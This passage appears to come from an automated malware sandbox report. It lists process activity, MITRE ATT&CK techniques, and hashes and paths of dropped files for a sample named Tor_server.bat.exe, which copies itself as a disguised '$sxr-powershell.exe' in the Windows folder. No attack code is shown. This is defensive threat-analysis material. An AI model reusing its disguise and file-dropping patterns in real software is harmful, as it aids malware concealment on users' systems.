PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1160

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5108

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4592

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:2528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:6300

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:3724
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3724 -s 384
  2⤵
  - Program crash
  PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6164

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:3708
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3708 -s 388
  2⤵
  - Program crash
  PID:4920

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:2652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5136

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER452.tmp.csv

Filesize
46KB

MD5
fe354742c7d0a5136149c510b2107517

SHA1
ecbd09a2b97a9ebcffc23b2025176306556691eb

SHA256
58037e17f3e91b25b2d5e620d622dae9739e4ee0806be2dd0e90ad93e294f9fd

SHA512
e2471c966a799a0206c15b2e6ce195e8ffb5538cd08314634e9cd86d5c389c5176623614bda3768b42367d5eee488e7fc79a8415a81d7340181742c139cb7b6d

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B1.tmp.txt

Filesize
12KB

MD5
a7fac6bf9fcd9d763e525a943baa3294

SHA1
d20a382687933efad2a0076d3c48e8eae3ead111

SHA256
7f0f2aca2c3276f590614e7eed4d856f1df026b006290be21fddebac50e77007

SHA512
d59a86bde948aacbc413dcbee17ed27f3f0de7cdaf208fa6da2d411946ded0e5ccf49f8f497b54975ebf5919e008aabaed95da4462b7814e93f082a86303309b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\3561c9ad-35d4-41e0-9e50-de9d59cfdc52.tmp

Filesize
199KB

MD5
825c3511f4a6d84b501600e5272edc09

SHA1
f18ea30c4079d4d2c421448560588343615fc6b3

SHA256
c97c8c64169d0beae3353b54899566ed234ace5d36a482631e705d5daecc7ba2

SHA512
e4132975efdd9157f530847da71617e19949fe34679ce9333284a5d917015313afa2c3343a58dfaea0fd01ec34a96b271a69caaf98db7bfee65cce4fadc82b56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
d017f1a82be9c32d3f5c0399db43e0fc

SHA1
21515f5ea473986ebfdb1eddd366fa8a4cf1f561

SHA256
1d2d1cfd9fb77829ca5a5bcd53a8614217fe5fa5a51bc11bf58cdc45856a4658

SHA512
fd261388239a95c59aff78ef4e7b07203b767a3dea4fe1c8cad46b39f5bbafd606810bede210e6b5bf2637378d2d02e040accbef1a035ed55ea4c79987db8097

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
15KB

MD5
b7558c23d4bbc25c1d272e9abb1b2f32

SHA1
99bd9a830963818d550d460a5002baeb21cf83f8

SHA256
c971b0f93396b1f91110ef41fb0f6aa0fa250ba736ae4e2bb0377efda6dc8a2f

SHA512
f77ca0421908ad9603ef3ec78e1f2940fa8c5ed1ce99da2ba4d09b0995ac43ed8d3b39bdf35c8d6df32ee09d8706c1952276f97f35f338a59fe58c1e0190218e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
32fa284fdf406509b84c734795808dda

SHA1
1fb8f7e7b48ab4631077fe1e142f585465c49019

SHA256
eb5bb610ae487048d5c1d43b5b966ecfc8d71d718498cd9bb38a851c28c108ef

SHA512
d4691d91bacfbaf65927a02433758919910287fc4196ac6809fc6bacdc51c4c8228d643ebda8d77f6d987d07d333975a8641aa1fa549fe2a6553a1bd5d43b320

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
b44c1ccdf8f0856bf83a99e82b3ed085

SHA1
96dce573fda30be8b5b6e367c3bc635085ff28f4

SHA256
fff4f22b580dbce865d7853b48ee02bc54c42bfa651aa69e726e42b3231bfa00

SHA512
48f64e1e028eb3846d1306837334889dab0b579ad0f35e1fe9f810f1b9b5a6ca08a7728d8dedce5daa873b1082998b3b6d4185fef12455e8348b71565939fb71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
818cad8a2acd4cee0807594a656c34d9

SHA1
acc55f16aa127e5458990bba584adceef28e8118

SHA256
ab5423e4b6623e76bed562ec2e30558190f72ccac63503b52ac361c42c3fcbee

SHA512
9e6752c813fefcf5883f1070642783ecc5d384abb9ae1f29841c80d2f963f0e0deabd834a84858a81312e9f1e019a45488e941fa42e74e01a5a3da7d147d9bac

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
1b2d8f06f54bc5dc83b938354072f0b0

SHA1
1c5ac2de5ef771b51d530ad9f8540ad52d0a6d82

SHA256
b958ef62a892bfd9dff4b416ab21b072f71c6b596bcae0eca8569eb8d6196567

SHA512
4dbcbbc1d772ac626677687fdcae35004c3982f285898cb06ffd694d09e24730fe5e372579532cf0e6af92c0517c810259081488369a34ad8acd8da5d52bdd1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
4e3c545e5f3cfe2954733ad6d07f1895

SHA1
3e2c16e137f1aa06f6c0af2e231d7a761ed5db58

SHA256
0a2aedc2168414db0e418bc92c39a5bf548732e3d7c6d1beb60f535b350a83a5

SHA512
82e091d11b6af83eec1e9247c873a40b2717f92a6180b8ae198ff6e5e0b50402b445a618316942c39355988b00f6cea8849fc0384afdb7afb678bd161902c63a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
01e29e5785d6ff2a8e673ed884b2932d

SHA1
fa3feaa0209829f062520b8ae495890d29edf75e

SHA256
504d1be422448a603df84fea9857cb4bd305b00e2ab7d63602c5e98f1d312231

SHA512
adbb650021a97ebaedda13a41fb882f599bea8c9e18f1c3994426543504f2df83cdc7ee0138430accada0e1b7e10861c96479b6690fc1800a20f2e1226978648

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
cdb3bba720674decaf6482aa4e92e9b0

SHA1
657e09f586965f3078d4834c20bbb57908614f65

SHA256
1994827d61846e2db5cae75bf3d730e47be64ef9b41a7eb3e356578f7e36bd0e

SHA512
c754a9120d2ad26c08371092687a65d371d6ce4f5a985ac2a003e7246f27b246cecec560076297d8697e5d9e094a34c32657a64725d46c7b9f53b507d5085599

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
12KB

MD5
81cb1dbe40aee6cede7c5ca073b6d035

SHA1
0de05ef1813d0951274222c31925d9fd1ae9703a

SHA256
e1138b534c4bef1e6c91d4e82398a70bd4b48983512e5c46eb572e017fe8c40b

SHA512
a886af6a0fa03e93d61b742c15bc0a81c9a354da684dbeb4867665995681f9e239d3d7079cf703e2eb1ea82a32a6e2388b50435aef39f30c819c134d3b209b03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0jzu4np4.nzb.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\Tor_server.zip

Filesize
9.4MB

MD5
0f8714644278f469a08af77fa002d3ad

SHA1
70b7e62b9f776fca3cd04003a8dcd6f022619fe3

SHA256
68991e891505cc5e46e49d4eb121780e6fbbab1caa13f18da9a08ee0c457ee9e

SHA512
6e67bfdc6e358158a2a62222a45a0736a09936896fce5533f69b0f34656e2cacba41a124be35b5b0af804954671712a744efd27e90f8ee034f4ac45f4ccb96fe

Download Submit
C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
340B

MD5
1374a3b54c08c64f801047d3ffc9a153

SHA1
b2bc5937108761ea75b12d9525fa5a2c037c3b74

SHA256
d39fb5357964023eaabff9978684bdccf794d0f4c87d714fb8a7b582c59ce83e

SHA512
965e66a8e841987653bf2e40eca5e27c2137edd0693fc31bc73b74da4a2b5eb14fe141c151edbc6371d04d96d5cf439d77f25d99d46d7e33fe65a61a58774f34

Download Submit
memory/364-861-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/364-857-0x000001C541BA0000-0x000001C541BC7000-memory.dmp

Filesize
156KB

Download
memory/364-898-0x000001C541BA0000-0x000001C541BC7000-memory.dmp

Filesize
156KB

Download
memory/516-811-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/516-778-0x00007FFF62F30000-0x00007FFF62FDE000-memory.dmp

Filesize
696KB

Download
memory/516-776-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/516-763-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/516-758-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/564-814-0x0000024867F80000-0x0000024867FA1000-memory.dmp

Filesize
132KB

Download
memory/564-823-0x0000024867FB0000-0x0000024867FD7000-memory.dmp

Filesize
156KB

Download
memory/564-817-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/564-816-0x0000024867FB0000-0x0000024867FD7000-memory.dmp

Filesize
156KB

Download
memory/564-959-0x0000024868010000-0x0000024868037000-memory.dmp

Filesize
156KB

Download
memory/648-821-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/648-818-0x000002128F9D0000-0x000002128F9F7000-memory.dmp

Filesize
156KB

Download
memory/648-962-0x000002128FF70000-0x000002128FF97000-memory.dmp

Filesize
156KB

Download
memory/648-827-0x000002128F9D0000-0x000002128F9F7000-memory.dmp

Filesize
156KB

Download
memory/660-777-0x0000027B18340000-0x0000027B18350000-memory.dmp

Filesize
64KB

Download
memory/660-775-0x0000027B18340000-0x0000027B18350000-memory.dmp

Filesize
64KB

Download
memory/700-859-0x00000268657A0000-0x00000268657C7000-memory.dmp

Filesize
156KB

Download
memory/700-863-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/700-904-0x00000268657A0000-0x00000268657C7000-memory.dmp

Filesize
156KB

Download
memory/732-1014-0x000002BFAF4E0000-0x000002BFAF507000-memory.dmp

Filesize
156KB

Download
memory/732-832-0x000002BFAF450000-0x000002BFAF477000-memory.dmp

Filesize
156KB

Download
memory/732-837-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/904-839-0x00000204EEC70000-0x00000204EEC97000-memory.dmp

Filesize
156KB

Download
memory/904-844-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/904-890-0x00000204EEC70000-0x00000204EEC97000-memory.dmp

Filesize
156KB

Download
memory/1000-838-0x00000185DF130000-0x00000185DF157000-memory.dmp

Filesize
156KB

Download
memory/1000-840-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/1020-851-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/1020-847-0x000001B9556D0000-0x000001B9556F7000-memory.dmp

Filesize
156KB

Download
memory/1020-894-0x000001B9556D0000-0x000001B9556F7000-memory.dmp

Filesize
156KB

Download
memory/1084-865-0x00007FFF25A60000-0x00007FFF25A70000-memory.dmp

Filesize
64KB

Download
memory/1084-907-0x00000298E96A0000-0x00000298E96C7000-memory.dmp

Filesize
156KB

Download
memory/1084-862-0x00000298E96A0000-0x00000298E96C7000-memory.dmp

Filesize
156KB

Download
memory/1148-917-0x0000026EC9EA0000-0x0000026EC9EC7000-memory.dmp

Filesize
156KB

Download
memory/1160-912-0x000002B092AB0000-0x000002B092AD7000-memory.dmp

Filesize
156KB

Download
memory/1212-699-0x00000175C2860000-0x00000175C2870000-memory.dmp

Filesize
64KB

Download
memory/1212-696-0x00000175C2860000-0x00000175C2870000-memory.dmp

Filesize
64KB

Download
memory/2644-725-0x000001BF5BF00000-0x000001BF5BF10000-memory.dmp

Filesize
64KB

Download
memory/2644-773-0x000001BF5BF00000-0x000001BF5BF10000-memory.dmp

Filesize
64KB

Download
memory/4076-718-0x0000017798380000-0x0000017798390000-memory.dmp

Filesize
64KB

Download
memory/4076-715-0x0000017798380000-0x0000017798390000-memory.dmp

Filesize
64KB

Download
memory/4352-545-0x00007FFF62F30000-0x00007FFF62FDE000-memory.dmp

Filesize
696KB

Download
memory/4352-544-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/4352-732-0x000001DC0A370000-0x000001DC0A532000-memory.dmp

Filesize
1.8MB

Download
memory/4352-728-0x000001DC09800000-0x000001DC09850000-memory.dmp

Filesize
320KB

Download
memory/4352-729-0x000001DC09910000-0x000001DC099C2000-memory.dmp

Filesize
712KB

Download
memory/4352-526-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-751-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/4352-1012-0x000001DC0A910000-0x000001DC0AB90000-memory.dmp

Filesize
2.5MB

Download
memory/4352-996-0x000001DC0A720000-0x000001DC0A914000-memory.dmp

Filesize
2.0MB

Download
memory/4352-970-0x000001DC005D0000-0x000001DC005D6000-memory.dmp

Filesize
24KB

Download
memory/4352-964-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-824-0x000001DC0A1E0000-0x000001DC0A21E000-memory.dmp

Filesize
248KB

Download
memory/4352-527-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-528-0x000001DC00170000-0x000001DC005D2000-memory.dmp

Filesize
4.4MB

Download
memory/4352-750-0x000001DC09770000-0x000001DC0979E000-memory.dmp

Filesize
184KB

Download
memory/4352-529-0x000001DC087E0000-0x000001DC0909E000-memory.dmp

Filesize
8.7MB

Download
memory/4352-887-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-536-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/4352-537-0x00007FFF62F30000-0x00007FFF62FDE000-memory.dmp

Filesize
696KB

Download
memory/4352-883-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-525-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/4352-819-0x000001DC097C0000-0x000001DC097D2000-memory.dmp

Filesize
72KB

Download
memory/4352-881-0x000001DC66DD0000-0x000001DC66DE0000-memory.dmp

Filesize
64KB

Download
memory/5188-597-0x000002782E160000-0x000002782E170000-memory.dmp

Filesize
64KB

Download
memory/5188-593-0x000002782E160000-0x000002782E170000-memory.dmp

Filesize
64KB

Download
memory/5216-476-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5216-474-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5584-762-0x0000013F929C0000-0x0000013F929D0000-memory.dmp

Filesize
64KB

Download
memory/5584-722-0x0000013F929C0000-0x0000013F929D0000-memory.dmp

Filesize
64KB

Download
memory/5656-829-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/5656-451-0x0000026418330000-0x0000026418340000-memory.dmp

Filesize
64KB

Download
memory/5656-430-0x00000264186B0000-0x00000264186D2000-memory.dmp

Filesize
136KB

Download
memory/5656-429-0x0000026418330000-0x0000026418340000-memory.dmp

Filesize
64KB

Download
memory/5656-428-0x0000026418330000-0x0000026418340000-memory.dmp

Filesize
64KB

Download
memory/5656-435-0x0000026418CD0000-0x0000026418D46000-memory.dmp

Filesize
472KB

Download
memory/5656-472-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/5656-471-0x0000026418C90000-0x0000026418C9A000-memory.dmp

Filesize
40KB

Download
memory/5656-470-0x00007FFF62F30000-0x00007FFF62FDE000-memory.dmp

Filesize
696KB

Download
memory/5656-469-0x00007FFF659D0000-0x00007FFF65BAB000-memory.dmp

Filesize
1.9MB

Download
memory/5656-468-0x0000026418D50000-0x0000026418DA8000-memory.dmp

Filesize
352KB

Download
memory/5656-461-0x0000026422340000-0x00000264226D0000-memory.dmp

Filesize
3.6MB

Download
memory/5656-456-0x00000264211E0000-0x0000026422342000-memory.dmp

Filesize
17.4MB

Download
memory/5656-446-0x0000026418330000-0x0000026418340000-memory.dmp

Filesize
64KB

Download
memory/5656-453-0x00000264000B0000-0x00000264000CA000-memory.dmp

Filesize
104KB

Download
memory/5656-834-0x00007FFF62F30000-0x00007FFF62FDE000-memory.dmp

Filesize
696KB

Download
memory/5656-452-0x0000026418330000-0x0000026418340000-memory.dmp

Filesize
64KB

Download
memory/5876-689-0x0000023F4CB20000-0x0000023F4CB30000-memory.dmp

Filesize
64KB

Download
memory/5876-687-0x0000023F4CB20000-0x0000023F4CB30000-memory.dmp

Filesize
64KB

Download
memory/5912-609-0x0000015CC1910000-0x0000015CC1920000-memory.dmp

Filesize
64KB

Download
memory/5912-600-0x0000015CC1910000-0x0000015CC1920000-memory.dmp

Filesize
64KB

Download
memory/6036-694-0x000002396BAA0000-0x000002396BAB0000-memory.dmp

Filesize
64KB

Download
memory/6036-691-0x000002396BAA0000-0x000002396BAB0000-memory.dmp

